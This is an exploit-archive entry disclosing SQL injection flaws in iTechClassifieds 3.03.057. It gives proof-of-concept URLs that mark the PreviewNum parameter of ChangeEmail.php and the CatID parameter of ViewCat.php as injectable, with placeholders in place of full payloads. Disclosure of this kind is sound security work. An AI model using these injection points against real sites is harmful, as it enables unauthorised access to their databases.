iTechClassifieds 3.03.057 - SQL Injection Vulnerability

2014-01-23T00:00:00
ID 1337DAY-ID-21792
Type zdt
Reporter vinicius777
Modified 2014-01-23T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: iTechClassifieds v3.03.057 - SQL Injection
# Date: 23/01/2014
# Exploit Author: vinicius777
# Vendor Homepage: http://itechscripts.com/download.html
# Software Link: http://itechscripts.com/downloads/download_itechclassifieds.html
# Version: 3.03.057
 
 
[1] SQL Injection - PreviewNun
 
PoC: http://localhost/iTechClassifieds_v3/ChangeEmail.php?PreviewNum=1' [SQL INJECTION]
 
 
 
[2] SQL Injection - CatID
 
PoC: http://localhost/iTechClassifieds_v3/ViewCat.php?CatID=[SQL INJECTION]
 
 
#
#
# Greetz to g0tm1lk and TheColonial.

#  0day.today [2018-01-04]  #